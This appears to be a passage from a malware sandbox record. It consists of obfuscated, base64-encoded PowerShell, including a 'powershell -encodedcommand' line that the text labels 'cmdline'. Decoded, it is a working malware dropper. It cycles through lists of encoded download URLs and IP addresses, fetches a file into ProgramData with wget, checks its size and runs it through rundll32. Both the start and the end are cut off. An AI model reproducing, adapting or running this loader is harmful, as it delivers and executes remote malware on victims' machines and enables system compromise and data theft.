QAIAAkAG4AbwBuAG0AaQBsAGkAdABhAG4AdABsAHkAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQA7ACQARABhAG0AYQBzAGsAaQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQA1AEEARABjAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAxADcAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBrAEEAWgBBAEIAbABBAEcAOABBAGMAQQBCAHkAQQBHAEUAQQBlAEEAQgBwAEEASABNAEEAZABBAEEAdQBBAEYASQBBAGQAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAEwAQQBCADIAQQBHAGsAQQBjAEEAQgB6AEEARABzAEEAYwB3AEIAcwBBAEcARQBBAFkAdwBCAHIAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEAIgA7ACQAcwB1AG0AbQBpAG4AZwBzAFAAbwBsAGwAZQByAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBFAEEAUQB3AEIAaABBAEgASQBBAFoAQQBCADEAQQBHAFUAQQBiAEEAQgBwAEEASABNAEEATABnAEIAMwBBAEcAOABBAGMAZwBCAHIAQQBBAD0APQBKAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYQBRAEIAcgBBAEcAawBBAGIAQQBCAHYAQQBHAEkAQQBiAEEAQgBoAEEASABNAEEAZABBAEEAdQBBAEcATQBBAGIAdwBCADEAQQBIAEkAQQBjAHcAQgBsAEEASABNAEEAIgA7ACQAdABvAGcAbABlAHMAcwBDAG8AcgBuAGMAcgBhAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAGgAQQBIAEEAQQBhAEEAQgA1AEEARwB3AEEAYQBRAEIAdQBBAEcAVQBBAFYAQQBCAG8AQQBHAGsAQQBiAFEAQgBpAEEARwB3AEEAWgBRAEIAdABBAEcARQBBAGIAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7ACQAZwBsAHUAZQBtAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADAAQQBIAEkAQQBZAFEAQgB1AEEASABNAEEAWQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBTAGcAQgBoAEEASABJAEEAWgB3AEIAdgBBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBZAHcAQgB2AEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHADgAQQBjAGcAQgB6AEEAQQA9AD0AZAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AdwBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAHUAcgBhAGQAZABpAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAGcAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAcABBAEgATQBBAGQAQQBCAEoAQQBIAE0AQQBiAHcAQgB0AEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCAHkAQQBIAEEAQQBhAEEAQgBwAEEASABNAEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBkAFEAQgB1AEEARwBrAEEAZABBAEIANQBBAEEAPQA9AFcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAdwBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADIAQQBBAD0APQBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABZAEEATgBnAEEAdQBBAEQAZwBBAE8AUQBBAD0AVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAYwB3AEIAcABBAEcARQBBAEwAZwBCADEAQQBIAE0AQQAiADsAJABpAGIAdQBwAHIAbwBmAGUAbgBEAGUAcgBlAGcAdQBsAGEAdABpAG8AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAZABRAEIAaQBBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAagBBAEcARQBBAFoAZwBCAGwAQQBBAD0APQBGAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAdwBCAHMAQQBIAGsAQQBjAEEAQgBvAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEMAQQBHAHcAQQBaAFEAQgB3AEEARwBnAEEAWQBRAEIAeQBBAEcAOABBAGMAQQBCAG8AQQBIAFEAQQBhAEEAQgBoAEEARwB3AEEAYgBRAEIAcABBAEcARQBBAEwAZwBCAG8AQQBHADgAQQBjAGcAQgB6AEEARwBVAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBrAEEAZABBAEIAMQBBAEgAUQBBAFoAUQBCAHkAQQBIAE0AQQBVAHcAQgB0AEEARwA4AEEAYQB3AEIAbABBAEgATQBBAEwAZwBCAGkAQQBHAEUAQQBiAGcAQgBrAEEAQQA9AD0AIgA7AH0AfQAkAFYAaQB0AHQAbABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEUAQQBOAHcAQQB1AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AdwBBAHgAQQBBAD0APQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEcAMABBAFoAUQBCAHkAQQBHAGsAQQBjAHcAQgBsAEEAQwA0AEEAWgBnAEIAaABBAEcAawBBAGIAQQBBAD0AbwBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAEkAQQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATQBnAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB4AEEARABZAEEATABnAEEAeABBAEQAYwBBAE8AQQBBAD0AIgA7ACQAbQBpAGMAcgBvAHAAaABhAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQA9AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAdABBAEcAawBBAGIAQQBCAHAAQQBHAEUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEcAUQBBAGIAdwBCADMAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAPQAiADsA"

cmdline

powershell -encodedcommand "JABIAG8AbABpAHMAdABBAGMAeQBsAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATwBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAD0ARwBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAHcAQQA9ACIAOwAkAG4AaQBiAG8AbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMwBBAEMANABBAE4AUQBBAHkAQQBDADQAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAFIARQBLAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABnAEEATABnAEEAeABBAEQASQBBAE0AdwBBAD0AUgBFAEsAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgBwAEEASABJAEEAWQBRAEIAcABBAEYAQQBBAGMAZwBCAGwAQQBIAEEAQQBkAFEAQgB3AEEARwBFAEEAYgBBAEEAdQBBAEcANABBAGQAUQBBAD0AIgA7ACQAWQBhAGsAbwBuAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAGsAQQBjAHcAQgB6AEEASABVAEEAWQBRAEIAawBBAEcARQBBAFkAZwBCAHMAQQBIAGsAQQBMAGcAQgBwAEEARwA0AEEAYQB3AEEAPQB5AHQAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAHcAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHcAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEANQA7ACQAYQBzAGUAYwByAGUAdABvAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHMAQQBHAHcAQQBiAHcAQgAzAEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHMAQQBHAGsAQQBkAEEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGIAdwBCAHoAQQBHAFUAQQBaAEEAQQA9ACIAOwAkAGQAbwBlAGwAaQBuAGcAQQByAGMAaABvAHYAZQByAHMAZQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBjAHcAQgB0AEEARwA4AEEAWQB3AEIAeQBBAEcARQBBAGQAQQBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9ACIAOwAkAGgAaQBiAGkAcwBjAHUAcwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAdwBBAEMANABBAE8AUQBBAHkAQQBDADQAQQBNAFEAQQA1AEEARABJAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAEUAQQBhAFEAQgAyAEEARwBFAEEAYgBBAEIANQBBAEcARQBBAEwAZwBCAHAAQQBHADQAQQBhAHcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBCAEEASABNAEEAWgBRAEIAcwBBAEcAdwBBAFkAUQBCADAAQQBHAFUAQQBSAFEAQgB0AEEASABBAEEAYQBBAEIAbABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBiAEEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEASABJAEEAZQBRAEEAPQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA0AEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGMAQQBOAHcAQQA9ACIAOwAkAGQAaQBvAHMAYwBvAHIAZQBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAUgBRAEIARgBBAEUAVQBBAFIAZwBBADQAQQBBAD0APQBiAHoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA4AEEAVQBBAEIAcwBBAEUAdwBBAE4AQQBCAHQAQQBGAFUAQQBMAHcAQgBuAEEARQBFAEEATQBBAEIAVQBBAEcAOABBAFMAQQBBAD0AYgB6AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAYwB3AEIANgBBAEUAZwBBAFUAdwBCAEkAQQBEAE0AQQBSAHcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATABlAHAAcgBvAHQAaQBjAEYAaQBkAGQAbABpAGUAcwAgAGkAbgAgACQAZABpAG8AcwBjAG8AcgBlAGkAbgAgAC0AcwBwAGwAaQB0ACAAIgBiAHoAVQAiACkAIAB7ACQAQwBhAHMAcwBvAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBBAEEAdQBBAEQARQBBAE8AUQBBADQAQQBBAD0APQBXAGEAegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcARQBBAGIAZwBCAGgAQQBIAFEAQQBiAHcAQgB5AEEARwBrAEEAYwBnAEIAcABBAEgAVQBBAGIAUQBCAHoAQQBGAE0AQQBkAEEAQgB5AEEARwBFAEEAWQB3AEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHADgAQQBMAGcAQgAyAEEARwBrAEEAYgBBAEIAcwBBAEcARQBBAGMAdwBBAD0AVwBhAHoAUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQAwAEEARABnAEEAIgA7ACQAUABlAGMAaABlAGQATABhAGQAeQBoAG8AbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAFkAdwBCAHAAQQBIAEEAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQBDAHIARgBsAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAawBBAFkAUQBCAHQAQQBHAEkAQQBaAFEAQgAxAEEASABnAEEATABnAEIAcQBBAEgAQQBBACIAOwAkAHUAbgBzAGUAZQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBFAEEAYwBnAEIAbABBAEcARQBBAGIAQQBCAHMAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAFoAQQBBAHUAQQBHAFEAQQBaAFEAQgB1AEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AGUAQQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADEAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAD0AZQBBAD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAFEAQgAxAEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHoAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQAiADsAdAByAHkAIAB7ACQAQQBuAGkAcwBpAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAbwBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBMAGcAQgB1AEEASABrAEEAWQB3AEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAZwBBAEwAZwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAdwBBAEMANABBAE0AUQBBADMAQQBEAFkAQQAiADsAJABSAGUAdAByAG8AbQBpAGcAcgBhAHQAaQBvAG4AUwBhAGwAdABpAHIAZQB3AGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAdgBBAEcASQBBAGIAQQBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEAWgBBAEIATgBBAEcAOABBAGMAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQwA0AEEAYwB3AEIAbwBBAEcAOABBAGQAdwBBAD0AIgA7ACQARQBsAGUAYwB0AHIAbwBsAHkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQA0AEEAQQA9AD0AIgA7ACQAbgBvAG4AbQBpAGwAaQB0AGEAbgB0AGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABMAGUAcAByAG8AdABpAGMARgBpAGQAZABsAGkAZQBzACkAKQA7AHcAZwBlAHQAIAAkAG4AbwBuAG0AaQBsAGkAdABhAG4AdABsAHkAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQA7ACQARABhAG0AYQBzAGsAaQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQA1AEEARABjAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAxADcAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBrAEEAWgBBAEIAbABBAEcAOABBAGMAQQBCAHkAQQBHAEUAQQBlAEEAQgBwAEEASABNAEEAZABBAEEAdQBBAEYASQBBAGQAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAEwAQQBCADIAQQBHAGsAQQBjAEEAQgB6AEEARABzAEEAYwB3AEIAcwBBAEcARQBBAFkAdwBCAHIAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEAIgA7ACQAcwB1AG0AbQBpAG4AZwBzAFAAbwBsAGwAZQByAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBFAEEAUQB3AEIAaABBAEgASQBBAFoAQQBCADEAQQBHAFUAQQBiAEEAQgBwAEEASABNAEEATABnAEIAMwBBAEcAOABBAGMAZwBCAHIAQQBBAD0APQBKAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYQBRAEIAcgBBAEcAawBBAGIAQQBCAHYAQQBHAEkAQQBiAEEAQgBoAEEASABNAEEAZABBAEEAdQBBAEcATQBBAGIAdwBCADEAQQBIAEkAQQBjAHcAQgBsAEEASABNAEEAIgA7ACQAdABvAGcAbABlAHMAcwBDAG8AcgBuAGMAcgBhAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAGgAQQBIAEEAQQBhAEEAQgA1AEEARwB3AEEAYQBRAEIAdQBBAEcAVQBBAFYAQQBCAG8AQQBHAGsAQQBiAFEAQgBpAEEARwB3AEEAWgBRAEIAdABBAEcARQBBAGIAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7ACQAZwBsAHUAZQBtAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADAAQQBIAEkAQQBZAFEAQgB1AEEASABNAEEAWQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBTAGcAQgBoAEEASABJAEEAWgB3AEIAdgBBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBZAHcAQgB2AEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHADgAQQBjAGcAQgB6AEEAQQA9AD0AZAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AdwBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAHUAcgBhAGQAZABpAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAGcAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAcABBAEgATQBBAGQAQQBCAEoAQQBIAE0AQQBiAHcAQgB0AEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCAHkAQQBIAEEAQQBhAEEAQgBwAEEASABNAEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBkAFEAQgB1AEEARwBrAEEAZABBAEIANQBBAEEAPQA9AFcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAdwBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADIAQQBBAD0APQBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABZAEEATgBnAEEAdQBBAEQAZwBBAE8AUQBBAD0AVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAYwB3AEIAcABBAEcARQBBAEwAZwBCADEAQQBIAE0AQQAiADsAJABpAGIAdQBwAHIAbwBmAGUAbgBEAGUAcgBlAGcAdQBsAGEAdABpAG8AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAZABRAEIAaQBBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAagBBAEcARQBBAFoAZwBCAGwAQQBBAD0APQBGAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAdwBCAHMAQQBIAGsAQQBjAEEAQgBvAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEMAQQBHAHcAQQBaAFEAQgB3AEEARwBnAEEAWQBRAEIAeQBBAEcAOABBAGMAQQBCAG8AQQBIAFEAQQBhAEEAQgBoAEEARwB3AEEAYgBRAEIAcABBAEcARQBBAEwAZwBCAG8AQQBHADgAQQBjAGcAQgB6AEEARwBVAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBrAEEAZABBAEIAMQBBAEgAUQBBAFoAUQBCAHkAQQBIAE0AQQBVAHcAQgB0AEEARwA4AEEAYQB3AEIAbABBAEgATQBBAEwAZwBCAGkAQQBHAEUAQQBiAGcAQgBrAEEAQQA9AD0AIgA7AH0AfQAkAFYAaQB0AHQAbABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEUAQQBOAHcAQQB1AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AdwBBAHgAQQBBAD0APQBvAG4AYQBBAEIAMABBAEgAUQBB